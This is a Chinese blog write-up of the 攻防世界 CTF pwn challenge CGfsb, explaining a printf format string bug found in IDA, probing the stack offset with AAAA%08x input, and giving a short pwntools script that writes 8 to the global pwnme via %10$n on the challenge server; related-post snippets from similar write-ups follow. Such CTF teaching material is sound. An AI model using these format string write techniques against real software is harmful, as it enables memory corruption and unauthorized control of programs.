攻防世界pwn-CGfsb

原创 已于 2025-03-11 20:32:27 修改 · 464 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #pwn

于 2025-03-11 20:30:58 首次发布

刚步入pwn,今天来讲一下攻防世界的pwn-CGfsb这道题。

下载附件,在kali里面查该附件是多少位程序以及有没有壳。判断该文件是32位程序且无壳

运行该文件我们发现它让我们输入名字和信息,然后再打印出来,然后退出结束。

 用ida打开这个文件,F5反编译查看主函数伪代码。

我们可以看出这个字符buf和s,是作为名字和信息的;如果pwnme==8,则输出flag值。

 这个printf输出s时,没有使用正确的格式化参数,比如printf(str)而不是printf("%s", str),这样就可能具有格式化漏洞。来看代码,主函数里有一个printf(s)的调用,这里的s是一个字符数组,之前用fgets(s, 100, stdin)读取我们的输入。这里的问题是,如果我们输入的s包含格式化字符串,比如%x或者%n,那么当调用printf(s)的时候,这些格式化占位符会被解析,可能导致信息泄露或内存覆盖,所以这里可能就是存在漏洞的地方。

双击跟进 pwnme 可以发现这是 bss 段上的全局变量:

 我们的目的也很明确了,通过格式化字符串漏洞修改pwnme的值使其等于8。

确定栈中可控参数的偏移量

输入(输入多个 %08x是为了覆盖足够多的栈位置,确保探测到用户输入的 AAAA。)

AAAA%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x

输出

AAAAff8be77e-f7f3b5c0-ff8be7dc-00000000-f7f72770-0804826c-687ae7dc-73676e61-000a6e61-41414141-78383025-3830252d-30252d78

41414141(即 AAAA)出现在输出的第 10 个位置(从 0 开始计数为第 9 个)。

用户输入的格式化字符串参数在栈上的偏移量为 10

 确定目标全局变量pwnme 的地址 target_address 了,IDA 中给出了地址 0x0804A068,因为没有 PIE 保护,所以 IDA 所展示的地址即是程序运行时所用的地址。

综上,payload可以构造出来了

from pwn import *

p = remote('223.112.5.141', 59484)
addr_pwnme = 0x0804A068
p.recvuntil("please tell me your name:\n")
p.sendline('J1ay')
payload = p32(addr_pwnme) + b'a'*0x4 + b'%10$n'
p.recvuntil("leave your message please:\n")
p.sendline(payload)
p.interactive()

lyh6613
关注
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 2002
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
攻防世界-CGfsb
qq_45771413的博客
04-23 525
知识点 格式化字符串漏洞(printf) 检查保护 PIE没有保护,全局变量地址固定 IDA 逻辑很简单,输入name,输入message,然后当pwnme等于8时,自动执行cat flag操作。但是pwnme没有被赋值,也没有可操作的地方,需要把它改成8。 但是找了一圈没发现有栈溢出的地方,看wp发现是格式化字符串漏洞,只能嗯学(栈溢出还没整熟悉〒▽〒)。 格式化字符串知识点 格式化字符串(摘自CTF-WIKI) 格式化字符串函数是根据格式化字符串函数来进行解析的。那么相应的要被解析的参数的个数也自然
攻防世界CGfsb
weixin_73399382的博客
07-05 437
我只简单讲一下:当未使用占位符直接printf(s)进行输出时存在安全隐患,堆栈中没有占位符来和格式化字符串中的参数进行替换,我们可以通过%n格式(将已经输出的字符数写入参数)和$(程序遇到一个占位符,就按顺序向后寻找参数,但是我们可以使用数字+$的形式,直接指定参数相对于格式化字符串的偏移)来修改指定内存单元中字段的值。在我们格式化字符串漏洞利用中,常用%p来泄露地址,%x也都可以,只是显示的数据为十六进制,这里显示的是ascii码,A的ascill码为41,数出在第十个参数位置,即偏移量为10。
攻防世界PWN--CGfsb
Rt1Text的博客
03-27 3544
首先checksec 32位/ 开了 Canary/NX保护 再运行一下 大致就是这个流程 接下来ida里面 分析C代码 分析前先get一下格式化字符串漏洞的基础知识 举3个常见的相关函数 fprintf----prints to a FILE stream printf----prints to the 'stdout' stream sprintf--prints into a string 常见语法 %d---打印 signed int %u---打印 u...
攻防世界PWN-CGfsb
Deeeelete的博客
11-12 531
题目:CGfsb 先下载附件 先确保本地的python有pwntools模块(pip install pwntools),模块安装后会有一个checksec命令,可以用该命令查看文件的基本信息 1.扔文件进kali,使用checksec 命令查看其具体内容 几个重要参数: Arch 程序架构信息,判断是64位还是32位,exp编写的时候是p64还是p32 RELRO Relocation Read-Onl(RELRO)此项技术主要针对GOT改写的攻击方式,它分成两种,Partial RELRO
攻防世界pwn-CGfsb
a_silly_coder的博客
05-18 406
首先检查文件保护 将文件拖入32位ida 阅读代码后,发现这是一个简单的格式化字符串漏洞,通过修改pwnme的数值为8,直接执行cat flag。pwnme在0x0804A068的位置。 随后用gdb确认偏移,有两种方法,一种是直接数栈上的位置,另一种是输入AAAA.%x.%x.%x查看。我采用第一种。 栈上是第11个位置,但是由于第一个位置参数是格式化字符串,所以输入的AAAA其实是格式化字符串的第10个参数。 开始编写攻击脚本。 from pwn import ...
攻防世界-pwn CGfsb (格式化字符串)
菜的只能随便写写博客
08-05 1737
0x01 拿到题目之后首先分析文件 得到信息: 32bit ELF可执行文件 未开启PIE(即静态反汇编得地址可以直接使用) 0x02 执行文件 执行文件之后发现程序接收两个输入并将其原样输出   0x03 利用IDA反汇编 发现flag,需要将pwnme的值改为8才能拿到flag 通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化串漏洞将...
adworld攻防世界-pwn-新手区-wp
令则
03-05 1394
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
[攻防世界]CGfsb
逆向萌新的博客
06-20 331
[攻防世界]CGfsb详解
攻防世界 CGfsb
10-03 704
1.题目 2.IDA分析 3.流程分析 流程很简单, 输入名字和信息,然后打印刚刚输入的信息出来,如果未初始化的pwnme的值为8,则成功cat flag。这里printf直接把&s打印出来,明显存在格式化字符串漏洞。 解释一下格式化字符串,一般printf的参数是:格式化字符串 + 参数1 + 参数2 ...。如果后面的参数数量对应不上格式化字符串中需要的参数,会自动从栈顶获取对应的参数。如下图: 输入“AAAAAAA%x-%x-%x-%x-%x-%x-%x-%x-%x-%.
[PWN](攻防世界)CGfsb
ljh15937的博客
09-15 303
分析程序漏洞 32位的程序,有 Canary 防护措施,栈不可执行技术 由于没有开启PIE,可以通过格式化字符串漏洞直接修改存在于 .bss 段的 pwnme 变量的值为 8,从而劫持程序执行流,执行system("cat flag);语句,获取 flag 利用程序 from pwn import * context(arch = 'amd64') context(log_level = 'DEBUG') context(terminal = ['deepin-terminal', '-x', '
攻防世界pwnCGFsb
nzw1134864657的博客
07-27 408
先看一下文件是32位的,再查看一下程序的保护机制 发现栈的保护开启,程序会在栈里放入一个canary,返回时检测canary是否发生变化 我们先运行一下程序看一下逻辑 在IDA中打开查看伪代码,发现如果pwnme=8,就可以到得到flag 此处要利用格式化字符串漏洞,使用%n格式修改任意地址内容,把前面已经打印的长度写入某个内存地址中去。 在这里设置断点 查看一下pwnme的地址 在wr...
攻防世界详解CGfsb,格式化字符串漏洞,欢迎讨论
XDiku的博客
01-11 367
格式化字符串漏洞
攻防世界-CGfsb-Writeup
SkYe's Blog
05-15 318
CGfsb [collapse title=“展开查看详情” status=“false”] 考点:写入小数字格式化字符串 完整 exp : from pwn import * context.log_level = ';debug'; p = remote("111.198.29.45",59528) #p = process("./CGfsb") pwnme = 0x0804A068 payload = "%8c%12$n" + p32(pwnme) p.recvuntil("name") p
攻防世界-CGfsb详细知识点及解答
m0_74047686的博客
03-07 958
做这道题的时候,对于格式化字符串的知识要有一定了解,不然的话,就要像我一样,忙来忙去,很麻烦的如何利用格式化字符串呢?我做了一些知识总结。格式化字符串攻击(Format String Vulnerabilities,简称FSV)是指攻击者通过构造恶意格式化字符串控制符,在程序中读写不该被访问的内存区域、获取敏感信息等操作。攻击者通常利用以下方式来实施格式化字符串攻击:(1)打印栈上的数据。
攻防世界 新手区CGfsb
qq_25044201的博客
12-27 196
老办法看一下开启了哪些保护 然后放在ida静态分析一下 大体意思是全局变量pwnme=8时会获得flag 但是pwnme这个变量我们无法控制,怎么办呢? 其中有个关键的 这里如果我们输入%x 它会输出什么? 我输入了aaaa 以及12个%x linux系统会按栈的顺序一一输出内容 而aaaa 泄露在第11个参数 所以我们先泄露这个pwnme全局变量的位置 然后通过%$n修改这地址的值 所以完成 ...
攻防世界 Pwn CGfsb
MrTreebook的博客
11-28 269
攻防世界pwn CGfsb1.先看保护机制2.看一下源代码有什么漏洞3.看一下格式化字符串溢出长度4.看一下pwnme的地址5.exp 1.先看保护机制 2.看一下源代码有什么漏洞 这里很明显是格式化字符串 看到这里发现程序需要pwnme==8才可以拿到flag 3.看一下格式化字符串溢出长度 输入数据后gdb调试数一下 offset=10 4.看一下pwnme的地址 那思路就是利用格式化字符串的%n写个8到pwnme中就好了 5.exp from pwn import * #a=process(
攻防世界--CGfsb238
Hk_Mayfly的博客
12-18 202
测试文件:https://adworld.xctf.org.cn/media/task/attachments/5982010c172744c8a1c93c24b5200b21 1.格式化字符串漏洞 我们使用printf输出字符串数组可以写成格式化输出: #include <stdio.h> int main() { char Buf[100]; pr...
攻防世界pwn pwn-100
最新发布
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值